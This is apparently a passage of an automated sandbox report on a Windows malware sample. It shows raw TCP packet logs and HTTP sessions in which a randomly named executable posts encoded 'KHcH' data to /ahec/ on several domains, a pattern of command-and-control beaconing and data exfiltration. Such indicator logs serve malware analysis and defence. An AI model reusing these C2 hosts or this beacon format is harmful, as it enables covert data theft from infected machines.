                                                                          Dec 2, 2023 18:51:00.462019920 CET804976634.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:00.462064028 CET4976680192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:01.678885937 CET4976680192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:02.694853067 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:02.794045925 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:02.794198036 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:02.794456959 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:02.893466949 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.085356951 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093022108 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093049049 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093064070 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093077898 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093092918 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093144894 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:03.093183994 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:03.093436003 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:03.195749998 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:08.603564978 CET4976880192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:08.783247948 CET804976837.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:08.783348083 CET4976880192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:08.783616066 CET4976880192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:08.963202000 CET804976837.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:08.963330030 CET4976880192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:10.288276911 CET4976880192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:11.304236889 CET4976980192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:11.488523960 CET804976937.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:11.488713980 CET4976980192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:11.489062071 CET4976980192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:11.673322916 CET804976937.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:11.673472881 CET4976980192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:12.991390944 CET4976980192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:14.007294893 CET4977080192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:14.187477112 CET804977037.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:14.187634945 CET4977080192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:14.188005924 CET4977080192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:14.368000031 CET804977037.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:14.368026972 CET804977037.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:14.368226051 CET4977080192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:16.319430113 CET4977080192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.335419893 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.515657902 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.515811920 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.515954018 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.698211908 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698240042 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698252916 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698271036 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698283911 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698297977 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698311090 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698324919 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698322058 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.698338032 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698354006 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698365927 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.698395967 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878627062 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878658056 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878669977 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878684044 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878700018 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878700972 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878714085 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878727913 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878741980 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878750086 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878756046 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878770113 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878772020 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878777981 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878791094 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878793955 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878806114 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878817081 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878824949 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878833055 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878859043 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878865957 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878875017 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878889084 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878901958 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878916025 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878920078 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.879050016 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059015989 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059041977 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059061050 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059072971 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059086084 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059098959 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059102058 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059132099 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059134007 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059149981 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059189081 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059201956 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059225082 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059273958 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059287071 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059304953 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059310913 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059326887 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059339046 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059348106 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059350967 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059365034 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059374094 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059376955 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059390068 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059402943 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059422970 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059437037 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059449911 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059462070 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059493065 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059587002 CET4977180192.168.2.537.97.254.27
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          0 | 192.168.2.5 | 49716 | 162.222.226.77 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:47:34.669131994 CET | 527 | OUT | GET /ahec/?Vjk=-N-tntX&KHcH=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVPoMkTtjkNnJA== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.alldaysslimmingstea.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:47:34.865154982 CET | 898 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:47:34 GMT
                                                                          Server: Apache
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Last-Modified: Tue, 15 Mar 2022 21:16:32 GMT
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 583
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/html
                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          1 | 192.168.2.5 | 49717 | 74.208.236.181 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:47:45.215646982 CET | 809 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.jones4deepriver.com
                                                                          Origin: http://www.jones4deepriver.com
                                                                          Referer: http://www.jones4deepriver.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=wmeP+ID8aGX5xnV5bDAf7xIzOuEi3vhUDThOds+ECR90iHnMJ7VSaPatqKT4UTn65q/mgqniicx7PsvtDEZeTDQztR5WTmoKamgnRfSzT4dS3w3d9OBgCQ5WkwusQyCt1dpnceRJsU6CnhYxaWD4uEpcro9GdfIyjkL8oB1p3DonHCxDCw==
                                                                          Dec 2, 2023 18:47:45.362108946 CET | 634 | IN | HTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Date: Sat, 02 Dec 2023 17:47:45 GMT
                                                                          Server: Apache
                                                                          Content-Encoding: gzip


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          2 | 192.168.2.5 | 49718 | 74.208.236.181 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:47:47.876436949 CET | 829 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.jones4deepriver.com
                                                                          Origin: http://www.jones4deepriver.com
                                                                          Referer: http://www.jones4deepriver.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=wmeP+ID8aGX5wHl5Zgof5RIwCOEi9PhQDTtOdtLJCnl0imXMI6VSZPatiqThbznz5qzUgoDiidV7PpDtWlZBSTQ1rR5HXmoKamgnRfXmT4FS3hHd8vBjPw5RjwusHiCp1doyccljsS+CnhIxaDj7hEoZ048actJJtEbjiwUTuRZNCXdQFKTKXeHI2dicWVC51vYYSbw=
                                                                          Dec 2, 2023 18:47:48.015408993 CET | 634 | IN | HTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Date: Sat, 02 Dec 2023 17:47:47 GMT
                                                                          Server: Apache
                                                                          Content-Encoding: gzip


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          3 | 192.168.2.5 | 49719 | 74.208.236.181 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:47:50.540918112 CET | 1842 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.jones4deepriver.com
                                                                          Origin: http://www.jones4deepriver.com
                                                                          Referer: http://www.jones4deepriver.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:47:50.681034088 CET | 634 | IN | HTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Date: Sat, 02 Dec 2023 17:47:50 GMT
                                                                          Server: Apache
                                                                          Content-Encoding: gzip


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          4 | 192.168.2.5 | 49720 | 74.208.236.181 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:47:53.207398891 CET | 523 | OUT | GET /ahec/?KHcH=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBsblhtcQm5YDg==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.jones4deepriver.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:47:53.348030090 CET | 824 | IN | HTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Content-Length: 626
                                                                          Connection: close
                                                                          Date: Sat, 02 Dec 2023 17:47:53 GMT
                                                                          Server: Apache
                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          5 | 192.168.2.5 | 49721 | 172.67.184.73 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:47:58.638782978 CET | 782 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.poria.link
                                                                          Origin: http://www.poria.link
                                                                          Referer: http://www.poria.link/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=FXiEFcnYTh5TWB+h9a01KtfYux9CWBqeibTyeLFE+I7ojhbMbrO47DIqdXYvDoS2tzpIFUzcZHgnGW7ds8Fp3VC2JnMccgrv/DguLtY5zbt8hRWNP/6o9GSslkDjZkCrmEbDGbAIWtsMxFJi0a3SYdCIj1BwzkusrSUeM51GVl/BiMBPZA==


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          6 | 192.168.2.5 | 49722 | 172.67.184.73 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:48:01.837263107 CET | 802 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.poria.link
                                                                          Origin: http://www.poria.link
                                                                          Referer: http://www.poria.link/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=FXiEFcnYTh5TXhih/5c1LNfXgR9CEBrZicbyeP1U+drogBrMava44DIqT3YqHoShtzU1FVPcZHknGWLdtP9q1FC0c3MeSArv/DguLtMTzbV8hhmNOdCv+GSjsEDjdkCvmEbbGatjWogMxE5i0vbRDtCKsVAZ8Vyinx8qLNcTKG6ujZtce7ZC2XXwEswN91CRAjCYuq8=


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          7 | 192.168.2.5 | 49723 | 172.67.184.73 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:48:04.496664047 CET | 1815 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.poria.link
                                                                          Origin: http://www.poria.link
                                                                          Referer: http://www.poria.link/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          8 | 192.168.2.5 | 49725 | 172.67.184.73 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:48:07.153966904 CET | 514 | OUT | GET /ahec/?Vjk=-N-tntX&KHcH=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VjrVHIYZDWS5A== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.poria.link
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:48:37.802370071 CET | 808 | IN | HTTP/1.1 522
                                                                          Date: Sat, 02 Dec 2023 17:48:37 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 15
                                                                          Connection: close
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WVrlndEIhrZs5Wz9KpXEbPcalzp%2BmMV%2FPMQKyISgrhsfTssCnbed7l6Pmrbhb1qi4yQyGfldODV1PwSMNYoOXYBSdGZuqMu7JnBWrRK255WVYa9hR9v%2FSsvGfptFNxs8Iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Referrer-Policy: same-origin
                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                          Server: cloudflare
                                                                          CF-RAY: 82f566210d1320a0-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                          Data Ascii: error code: 522


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          9 | 192.168.2.5 | 49728 | 37.140.192.89 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:48:43.601402044 CET | 797 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.makeinai.online
                                                                          Origin: http://www.makeinai.online
                                                                          Referer: http://www.makeinai.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=Bw1JIdbMW2KoJUK+Be6JyXOVPyCe9oohVMIsw30X2yXi/kt6sRhrlPU/MVxeY0gnXsff8+hr+X4NeC26RX+9lnOXYeCIAeV7uhlBZ/rYUdpLc+Do917HQJUwmktEfPSUlSuOLt7wpsP19h2myCwIhq8JxIEiIWGvfPAft/zeEZKyJzpz7Q==
                                                                          Dec 2, 2023 18:48:43.824506044 CET | 1340 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: nginx
                                                                          Date: Sat, 02 Dec 2023 17:48:43 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          ETag: W/"64f9f107-377d8"
                                                                          Content-Encoding: gzip


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          10 | 192.168.2.5 | 49729 | 37.140.192.89 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:48:46.355299950 CET | 817 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.makeinai.online
                                                                          Origin: http://www.makeinai.online
                                                                          Referer: http://www.makeinai.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=Bw1JIdbMW2KoP3S+NZmJ03OWDSCezIolVMEsw1YH2Azi/Fd6vTJrgPU/UlwWFEg8Xsii87Zr+UENeHy6QkGik3OVQ+COfuV7uhlBZ7DyUdxLcPTo8U7EdpUznktEUvT8lSvrLoeVpqT19l6mxTwJuq8LuYEsFjz2asRWv+nfbZvZBGFg8i9P42C9SiqtRu9ZGQsxeg8=
                                                                          Dec 2, 2023 18:48:46.584605932 CET | 1340 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: nginx
